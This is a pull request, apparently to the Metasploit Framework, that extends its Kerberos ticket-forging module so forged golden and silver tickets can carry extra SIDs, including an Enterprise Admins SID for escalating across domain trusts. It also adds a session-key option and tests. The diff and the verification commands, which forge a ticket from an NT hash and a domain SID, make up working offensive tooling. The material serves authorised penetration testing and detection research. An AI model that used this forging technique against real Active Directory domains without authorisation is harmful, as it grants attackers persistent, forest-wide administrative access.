### PR TITLE
Add support for forging inter-realm Kerberos tickets

### DIFF
--- a/lib/msf/core/exploit/remote/kerberos/client/pac.rb
+++ b/lib/msf/core/exploit/remote/kerberos/client/pac.rb
@@ -33,6 +33,7 @@ module Msf
             # @option opts [Integer] :user_id the user SID Ex: 1000
             # @option opts [Integer] :group_id Ex: 513 for 'Domain Users'
             # @option opts [Array<Integer>] :group_ids
+            # @option opts [Array<String>] :extra_sids An array of extra sids, Ex: `['S-1-5-etc-etc-519']`
             # @option opts [String] :realm
             # @option opts [String] :domain_id the domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962
             # @option opts [Time] :logon_time
@@ -48,6 +49,7 @@ module Msf
               user_id = opts[:user_id] || Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID
               primary_group_id = opts[:group_id] || Rex::Proto::Kerberos::Pac::DOMAIN_USERS
               group_ids = opts[:group_ids] || [Rex::Proto::Kerberos::Pac::DOMAIN_USERS]
+              extra_sids = opts[:extra_sids] || []
               domain_name = opts[:realm] || ''
               domain_id = opts[:domain_id] || Rex::Proto::Kerberos::Pac::NT_AUTHORITY_SID
               logon_time = opts[:logon_time] || Time.now
@@ -68,12 +70,15 @@ module Msf
                 logon_server: ''
               )
               validation_info.group_ids = group_ids
-
+              if extra_sids && extra_sids.length > 0
+                validation_info.extra_sids = extra_sids.map do |sid|
+                  { sid: sid, attributes: Rex::Proto::Kerberos::Pac::SE_GROUP_ALL }
+                end
+              end
 
               logon_info = Rex::Proto::Kerberos::Pac::Krb5LogonInformation.new(
                 data: validation_info
               )
-
 
               client_info = Rex::Proto::Kerberos::Pac::Krb5ClientInfo.new(
                 client_id: logon_time,

--- a/lib/msf/core/exploit/remote/kerberos/ticket.rb
+++ b/lib/msf/core/exploit/remote/kerberos/ticket.rb
@@ -7,9 +7,11 @@ module Msf
     class Remote
       module Kerberos
         module Ticket
+          # @param [String] session_key The session key
+          # @param [Array<String>] extra_sids An array of extra sids, Ex: `['S-1-5-etc-etc-519']`
           def forge_ticket(enc_key:, enc_type:, start_time:, end_time:, sname:, flags:,
                            domain:, username:, user_id: Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID,
-                           domain_sid:, save_ccache: true)
+                           domain_sid:, extra_sids: [], session_key: nil)
             sname_principal = create_principal(sname)
             cname_principal = create_principal(username)
             group_ids = [
@@ -19,7 +21,6 @@ module Msf
               Rex::Proto::Kerberos::Pac::SCHEMA_ADMINISTRATORS,
               Rex::Proto::Kerberos::Pac::ENTERPRISE_ADMINS,
             ]
-            key_length = enc_type == Rex::Proto::Kerberos::Crypto::Encryption::AES256 ? 16 : 8
             # https://www.ietf.org/rfc/rfc3962.txt#:~:text=7.%20%20Assigned%20Numbers
             case enc_type
             when Rex::Proto::Kerberos::Crypto::Encryption::AES256
@@ -29,6 +30,13 @@ module Msf
             else
               checksum_type = Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5
             end
+
+            session_key_byte_length = enc_type == Rex::Proto::Kerberos::Crypto::Encryption::AES256 ? 32 : 16
+            session_key ||= SecureRandom.hex(session_key_byte_length / 2)
+            if session_key.bytes.length != session_key_byte_length
+              raise "Invalid key length for session key, expected #{session_key_byte_length}, got #{session_key.length} for session key #{session_key}"
+            end
+
             opts = {
               client: cname_principal,
               server: sname_principal,
@@ -39,13 +47,14 @@ module Msf
               realm: domain.upcase,
               key_value: enc_key,
               checksum_enc_key: enc_key,
-              secure_random_key: SecureRandom.hex(key_length),
+              session_key: session_key,
               enc_type: enc_type,
               user_id: user_id,
               group_ids: group_ids,
               checksum_type: checksum_type,
               client_name: username,
               domain_id: domain_sid,
+              extra_sids: extra_sids,
               flags: flags
             }
 
@@ -62,10 +71,6 @@ module Msf
             # Wrap the ticket up with its metadata, i.e. its key/sname/time information etc
             ccache = ticket_as_krb5ccache(ticket, opts: opts)
 
-            if save_ccache
-              Kerberos::Ticket::Storage.store_ccache(ccache, framework_module: self)
-            end
-
             ccache
           end
 
@@ -73,7 +78,7 @@ module Msf
             ticket_enc_part = Rex::Proto::Kerberos::Model::TicketEncPart.new
 
             ticket_enc_part.key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
-              type: opts[:enc_type], value: opts[:secure_random_key]
+              type: opts[:enc_type], value: opts[:session_key]
             )
             ticket_enc_part.flags = opts[:flags]
             ticket_enc_part.crealm = opts[:realm]
@@ -124,7 +129,7 @@ module Msf
                   server: create_ccache_principal(opts[:server], opts[:realm]),
                   keyblock: {
                     enctype: opts[:enc_type],
-                    data: opts[:secure_random_key]
+                    data: opts[:session_key]
                   },
                   authtime: opts[:auth_time],
                   starttime: opts[:start_time],

--- a/lib/rex/proto/kerberos/credential_cache/krb5_ccache_presenter.rb
+++ b/lib/rex/proto/kerberos/credential_cache/krb5_ccache_presenter.rb
@@ -106,7 +106,7 @@ module Rex::Proto::Kerberos::CredentialCache
       output.join("\n")
     end
 
-    # @param [Rex::Proto::Kerberos::Pac::Krb5LogonInfo] logon_info
+    # @param [Rex::Proto::Kerberos::Pac::Krb5LogonInformation] logon_info
     # @return [String] A human readable representation of a Logon Information
     def present_logon_info(logon_info)
       validation_info = logon_info.data
@@ -133,12 +133,13 @@ module Rex::Proto::Kerberos::CredentialCache
       output << "Last Failed Interactive Logon: #{present_ndr_file_time(validation_info.last_failed_i_logon)}".indent(2)
       output << "Failed Interactive Logon Count: #{validation_info.failed_i_logon_count}".indent(2)
 
-      output << "SID Count: #{validation_info.sid_count}".indent(2)
+      output << "Extra SID Count: #{validation_info.sid_count}".indent(2)
+      output << validation_info.extra_sids.map { |extra_sid| "SID: #{extra_sid.sid}, Attributes: #{extra_sid.attributes}".indent(4) } if validation_info.extra_sids.any?
       output << "Resource Group Count: #{validation_info.resource_group_count}".indent(2)
 
       output << "Group Count: #{validation_info.group_count}".indent(2)
       output << 'Group IDs:'.indent(2)
-      output << validation_info.group_memberships.map { |group| "Relative ID: #{group.relative_id}, Attributes: #{group.attributes}".indent(4) }
+      output << validation_info.group_memberships.map { |group| "Relative ID: #{group.relative_id}, Attributes: #{group.attributes}".indent(4) } if validation_info.group_memberships.any?
 
       output << "Logon Domain ID: #{validation_info.logon_domain_id}".indent(2)
 
@@ -248,7 +249,7 @@ module Rex::Proto::Kerberos::CredentialCache
       output << "Client Name: '#{ticket_enc_part.cname}'"
       output << "Client Realm: '#{ticket_enc_part.crealm}'"
       output << "Ticket etype: #{ticket_enc_part.key.type} (#{Rex::Proto::Kerberos::Crypto::Encryption.const_name(ticket_enc_part.key.type)})"
-      output << "Encryption Key: #{ticket_enc_part.key.value.unpack1('H*')}"
+      output << "Session Key: #{ticket_enc_part.key.value.unpack1('H*')}"
       output << "Flags: 0x#{ticket_enc_part.flags.to_i.to_s(16).rjust(8, '0')} (#{ticket_enc_part.flags.enabled_flag_names.join(', ')})"
 
       auth_data_data = ticket_enc_part.authorization_data.elements.first[:data]

--- a/lib/rex/proto/kerberos/pac/krb5_pac.rb
+++ b/lib/rex/proto/kerberos/pac/krb5_pac.rb
@@ -182,9 +182,18 @@ module Rex::Proto::Kerberos::Pac
     #   @return [Integer] List of GROUP_MEMBERSHIP structures that contains the groups to which the account belongs in the account domain
     pgroup_membership_array :group_memberships, type: [:group_membership, { byte_align: 4 }]
 
+    # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/69e86ccc-85e3-41b9-b514-7d969cd0ed73
     # @!attribute [rw] user_flags
     #   @return [Integer] A set of bit flags that describe the user's logon information
-    ndr_uint32 :user_flags
+    ndr_uint32 :user_flags,
+               initial_value: -> do
+                 value = 0
+                 # Bit D: Indicates that the ExtraSids field is populated and contains additional SIDs.
+                 value |= (1 << 5) if self.sid_count > 0
+                 # Bit H: Indicates that the ResourceGroupIds field is populated.
+                 value |= (1 << 9) if self.resource_group_count > 0
+                 value
+               end
 
     # @!attribute [rw] user_session_key
     #   @return [Integer] A session key that is used for cryptographic operations on a session
@@ -233,16 +242,16 @@ module Rex::Proto::Kerberos::Pac
 
     # @!attribute [rw] sid_count
     #   @return [Integer] Total number of SIDs present in the ExtraSids member
-    ndr_uint32 :sid_count
+    ndr_uint32 :sid_count, initial_value: -> { extra_sids.length }
 
-    # @!attribute [rw] extra_sids_ptr
-    #   @return [Integer] A pointer to a list of KERB_SID_AND_ATTRIBUTES structures that contain a list of SIDs
+    # @!attribute [rw] extra_sids
+    #   @return [Integer] A list of KERB_SID_AND_ATTRIBUTES structures that contain a list of SIDs
     #   corresponding to groups in domains other than the account domain to which the principal belongs
-    krb5_sid_and_attributes_ptr :extra_sids_ptr
+    krb5_sid_and_attributes_ptr :extra_sids # :extra_sids_ptr
 
-    # @!attribute [rw] resource_group_domain_sid_ptr
-    #   @return [Integer] Pointer to SID of the domain for the server whose resources the client is authenticating to
-    prpc_sid :resource_group_domain_sid_ptr # prpc_sid :resource_group_domain_sid_ptr
+    # @!attribute [rw] resource_group_domain_sid
+    #   @return [Integer] SID of the domain for the server whose resources the client is authenticating to
+    prpc_sid :resource_group_domain_sid # :resource_group_domain_sid_ptr
 
     # @!attribute [rw] resource_group_count
     #   @return [Integer] Number of resource group identifiers stored in ResourceGroupIds

--- a/modules/auxiliary/admin/kerberos/forge_ticket.rb
+++ b/modules/auxiliary/admin/kerberos/forge_ticket.rb
@@ -18,7 +18,8 @@ class MetasploitModule < Msf::Auxiliary
         },
         'Author' => [
           'Benjamin Delpy', # Original Implementation
-          'Dean Welch' # Metasploit Module
+          'Dean Welch', # Metasploit Module
+          'alanfoster' # Enhancements
         ],
         'References' => [
           %w[URL https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it]
@@ -46,10 +47,18 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('AES_KEY', [ false, 'The krbtgt/service AES key' ]),
         OptString.new('DOMAIN', [ true, 'The Domain (upper case) Ex: DEMO.LOCAL' ]),
         OptString.new('DOMAIN_SID', [ true, 'The Domain SID, Ex: S-1-5-21-1755879683-3641577184-3486455962']),
+        OptString.new('EXTRA_SIDS', [ false, 'Extra sids separated by commas, Ex: S-1-5-21-1755879683-3641577184-3486455962-519']),
         OptString.new('SPN', [ false, 'The Service Principal Name (Only used for silver ticket)'], conditions: %w[ACTION == FORGE_SILVER]),
         OptInt.new('DURATION', [ true, 'Duration of the ticket in days', 3650]),
       ]
     )
+
+    register_advanced_options(
+      [
+        OptString.new('SessionKey', [ false, 'The session key, if not set - one will be generated' ]),
+      ]
+    )
+
     deregister_options('RHOSTS', 'RPORT', 'Timeout')
   end
 
@@ -71,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
   def forge_ccache(sname:, flags:)
     enc_key, enc_type = get_enc_key_and_type
 
-    start_time = Time.now
+    start_time = Time.now.utc
     end_time = start_time + SECS_IN_DAY * datastore['DURATION']
 
     ccache = forge_ticket(
@@ -84,8 +93,13 @@ class MetasploitModule < Msf::Auxiliary
       domain: datastore['DOMAIN'],
       username: datastore['USER'],
       user_id: datastore['USER_RID'],
-      domain_sid: datastore['DOMAIN_SID']
+      domain_sid: datastore['DOMAIN_SID'],
+      extra_sids: extra_sids,
+      session_key: datastore['SessionKey'].blank? ? nil : datastore['SessionKey'].strip
     )
+
+    Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ccache, framework_module: self)
+
     if datastore['VERBOSE']
       print_ccache_contents(ccache, key: enc_key)
     end
@@ -155,5 +169,9 @@ class MetasploitModule < Msf::Auxiliary
     if datastore['AES_KEY'].present? && (datastore['AES_KEY'].size != 32 && datastore['AES_KEY'].size != 64)
       fail_with(Msf::Exploit::Failure::BadConfig, "AES key length was #{datastore['AES_KEY'].size} should be 32 or 64")
     end
+  end
+
+  def extra_sids
+    (datastore['EXTRA_SIDS'] || '').split(',').map(&:strip).reject(&:blank?)
   end
 end

--- a/spec/lib/msf/core/exploit/remote/kerberos/ticket_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/kerberos/ticket_spec.rb
@@ -44,7 +44,6 @@ RSpec.shared_examples 'ticket' do
         sname: spn,
         username: username,
         flags: Rex::Proto::Kerberos::Model::TicketFlags.from_flags(flags),
-        save_ccache: false
       )
     end
 

--- a/spec/lib/rex/proto/kerberos/credential_cache/krb5_ccache_presenter_spec.rb
+++ b/spec/lib/rex/proto/kerberos/credential_cache/krb5_ccache_presenter_spec.rb
@@ -179,7 +179,7 @@ RSpec.describe Rex::Proto::Kerberos::CredentialCache::Krb5CcachePresenter do
                 Client Name: 'Administrator'
                 Client Realm: 'WINDOMAIN.LOCAL'
                 Ticket etype: 18 (AES256)
-                Encryption Key: 3835366238646261363736326161393037386566633133613535323934333739
+                Session Key: 3835366238646261363736326161393037386566633133613535323934333739
                 Flags: 0x50e00000 (FORWARDABLE, PROXIABLE, RENEWABLE, INITIAL, PRE_AUTHENT)
                 PAC:
                   Validation Info:
@@ -200,7 +200,7 @@ RSpec.describe Rex::Proto::Kerberos::CredentialCache::Krb5CcachePresenter do
                     Last Successful Interactive Logon: No Time Set (0)
                     Last Failed Interactive Logon: No Time Set (0)
                     Failed Interactive Logon Count: 0
-                    SID Count: 0
+                    Extra SID Count: 0
                     Resource Group Count: 0
                     Group Count: 5
                     Group IDs:

--- a/spec/modules/auxiliary/admin/kerberos/forge_ticket_spec.rb
+++ b/spec/modules/auxiliary/admin/kerberos/forge_ticket_spec.rb
@@ -1,0 +1,133 @@
+require 'rspec'
+
+RSpec.describe 'kerberos keytab' do
+  include_context 'Msf::UIDriver'
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'auxiliary',
+      reference_name: 'admin/kerberos/forge_ticket'
+    )
+  end
+
+  before(:each) do
+    Timecop.freeze(Time.parse('Jul 15, 2022 12:33:40.000000000 GMT'))
+    subject.datastore['VERBOSE'] = true
+    allow(driver).to receive(:input).and_return(driver_input)
+    allow(driver).to receive(:output).and_return(driver_output)
+    subject.init_ui(driver_input, driver_output)
+  end
+
+  after do
+    Timecop.return
+  end
+
+  describe '#run' do
+    context 'when forging golden tickets' do
+      it 'generates a golden ticket' do
+        subject.datastore['ACTION'] = 'FORGE_GOLDEN'
+        subject.datastore['DOMAIN'] = 'demo.local'
+        subject.datastore['DOMAIN_SID'] = 'S-1-5-21-1266190811-2419310613-1856291569'
+        subject.datastore['NTHASH'] = '767400b2c71afa35a5dca216f2389cd9'
+        subject.datastore['USER'] = 'Administrator'
+        # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/81d92bba-d22b-4a8c-908a-554ab29148ab
+        subject.datastore['EXTRA_SIDS'] = ' S-1-18-1,  S-1-5-21-1266190811-2419310613-1856291569-519, '
+        subject.datastore['SessionKey'] = 'A' * 16
+
+        subject.run
+
+        ticket_save_path = @output.join("\n")[/Cache ticket saved to (.*)$/, 1]
+        expect(@output.join("\n")).to match_table <<~TABLE
+          TGT MIT Credential Cache ticket saved to #{ticket_save_path}
+          Primary Principal: Administrator@DEMO.LOCAL
+          Ccache version: 4
+
+          Creds: 1
+            Credential[0]:
+              Server: krbtgt/DEMO.LOCAL@DEMO.LOCAL
+              Client: Administrator@DEMO.LOCAL
+              Ticket etype: 23 (RC4_HMAC)
+              Key: 41414141414141414141414141414141
+              Subkey: false
+              Ticket Length: 1014
+              Ticket Flags: 0x50e00000 (FORWARDABLE, PROXIABLE, RENEWABLE, INITIAL, PRE_AUTHENT)
+              Addresses: 0
+              Authdatas: 0
+              Times:
+                Auth time: #{Time.parse('2022-07-15 13:33:40 +0100').to_time}
+                Start time: #{Time.parse('2022-07-15 13:33:40 +0100').to_time}
+                End time: #{Time.parse('2032-07-12 13:33:40 +0100').to_time}
+                Renew Till: #{Time.parse('2032-07-12 13:33:40 +0100').to_time}
+              Ticket:
+                Ticket Version Number: 5
+                Realm: DEMO.LOCAL
+                Server Name: krbtgt/DEMO.LOCAL
+                Encrypted Ticket Part:
+                  Ticket etype: 23 (RC4_HMAC)
+                  Key Version Number: 2
+                  Decrypted (with key: 767400b2c71afa35a5dca216f2389cd9):
+                    Times:
+                      Auth time: #{Time.parse('2022-07-15 12:33:40 UTC').to_time}
+                      Start time: #{Time.parse('2022-07-15 12:33:40 UTC').to_time}
+                      End time: #{Time.parse('2032-07-12 12:33:40 UTC').to_time}
+                      Renew Till: #{Time.parse('2032-07-12 12:33:40 UTC').to_time}
+                    Client Addresses: 0
+                    Transited: tr_type: 0, Contents: ""
+                    Client Name: 'Administrator'
+                    Client Realm: 'DEMO.LOCAL'
+                    Ticket etype: 23 (RC4_HMAC)
+                    Session Key: 41414141414141414141414141414141
+                    Flags: 0x50e00000 (FORWARDABLE, PROXIABLE, RENEWABLE, INITIAL, PRE_AUTHENT)
+                    PAC:
+                      Validation Info:
+                        Logon Time: #{Time.parse('2022-07-15 13:33:40 +0100').to_time}
+                        Logoff Time: Never Expires (inf)
+                        Kick Off Time: Never Expires (inf)
+                        Password Last Set: No Time Set (0)
+                        Password Can Change: No Time Set (0)
+                        Password Must Change: Never Expires (inf)
+                        Logon Count: 0
+                        Bad Password Count: 0
+                        User ID: 500
+                        Primary Group ID: 513
+                        User Flags: 32
+                        User Session Key: 00000000000000000000000000000000
+                        User Account Control: 528
+                        Sub Auth Status: 0
+                        Last Successful Interactive Logon: No Time Set (0)
+                        Last Failed Interactive Logon: No Time Set (0)
+                        Failed Interactive Logon Count: 0
+                        Extra SID Count: 2
+                          SID: S-1-18-1, Attributes: 7
+                          SID: S-1-5-21-1266190811-2419310613-1856291569-519, Attributes: 7
+                        Resource Group Count: 0
+                        Group Count: 5
+                        Group IDs:
+                          Relative ID: 513, Attributes: 7
+                          Relative ID: 512, Attributes: 7
+                          Relative ID: 520, Attributes: 7
+                          Relative ID: 518, Attributes: 7
+                          Relative ID: 519, Attributes: 7
+                        Logon Domain ID: S-1-5-21-1266190811-2419310613-1856291569
+                        Effective Name: 'Administrator'
+                        Full Name: ''
+                        Logon Script: ''
+                        Profile Path: ''
+                        Home Directory: ''
+                        Home Directory Drive: ''
+                        Logon Server: ''
+                        Logon Domain Name: 'DEMO.LOCAL'
+                      Client Info:
+                        Name: 'Administrator'
+                        Client ID: #{Time.parse('2022-07-15 13:33:40 +0100').to_time}
+                      Pac Server Checksum:
+                        Signature: 6dc9bd5369b0defac778b349e298012a
+                      Pac Privilege Server Checksum:
+                        Signature: 0ac8624ae3cc7cd3750fcf902d006b5f
+        TABLE
+        expect(ticket_save_path).to_not be_nil
+      end
+    end
+  end
+end

--- a/spec/modules/auxiliary/admin/kerberos/inspect_ticket_spec.rb
+++ b/spec/modules/auxiliary/admin/kerberos/inspect_ticket_spec.rb
@@ -497,7 +497,7 @@ RSpec.describe 'kerberos inspect ticket' do
                 Client Name: 'Administrator'
                 Client Realm: 'WINDOMAIN.LOCAL'
                 Ticket etype: 18 (AES256)
-                Encryption Key: 3031363031303130376565306436383863393961393338383633346165303431
+                Session Key: 3031363031303130376565306436383863393961393338383633346165303431
                 Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
                 PAC:
                   Validation Info:
@@ -518,7 +518,7 @@ RSpec.describe 'kerberos inspect ticket' do
                     Last Successful Interactive Logon: No Time Set (0)
                     Last Failed Interactive Logon: No Time Set (0)
                     Failed Interactive Logon Count: 0
-                    SID Count: 0
+                    Extra SID Count: 0
                     Resource Group Count: 0
                     Group Count: 5
                     Group IDs:
@@ -623,7 +623,7 @@ RSpec.describe 'kerberos inspect ticket' do
                 Client Name: 'Administrator'
                 Client Realm: 'WINDOMAIN.LOCAL'
                 Ticket etype: 23 (RC4_HMAC)
-                Encryption Key: 66383738646463363738633761643766
+                Session Key: 66383738646463363738633761643766
                 Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
                 PAC:
                   Validation Info:
@@ -644,7 +644,7 @@ RSpec.describe 'kerberos inspect ticket' do
                     Last Successful Interactive Logon: No Time Set (0)
                     Last Failed Interactive Logon: No Time Set (0)
                     Failed Interactive Logon Count: 0
-                    SID Count: 0
+                    Extra SID Count: 0
                     Resource Group Count: 0
                     Group Count: 5
                     Group IDs:


### PR DESCRIPTION
Add support for forging inter-realm Kerberos tickets

## Verification

Verify that forging a ticket works:
```
msf6 auxiliary(admin/kerberos/forge_ticket) > run nthash=d15b04d8f5072b2a9af2fa98551dde7c domain_sid=S-1-5-21-1730736754-3670833088-1505805843 domain=dev.demo.local extra_sids=S-1-5-21-1165394890-86036875-1857052327-519 spn=krbtgt/DEMO.LOCAL user=fakeuser

[*] TGT MIT Credential Cache ticket saved to /home/vagrant/.msf4/loot/20230303082945_default_unknown_mit.kerberos.cca_642796.bin
[*] Auxiliary module execution completed
```

And that the content can be inspected to see the extra sids:

```
msf6 auxiliary(admin/kerberos/inspect_ticket) > run ticket_path=/home/vagrant/.msf4/loot/20230303082945_default_unknown_mit.kerberos.cca_642796.bin nthash=d15b04d8f5072b2a9af2fa98551dde7c

[*] Credentials cache: File:/home/vagrant/.msf4/loot/20230303082945_default_unknown_mit.kerberos.cca_642796.bin
[*] Primary Principal: fakeuser@DEV.DEMO.LOCAL


... etc ...
              Extra SID Count: 1
                SID: S-1-5-21-1165394890-86036875-1857052327-519, Attributes: 7
... etc...
```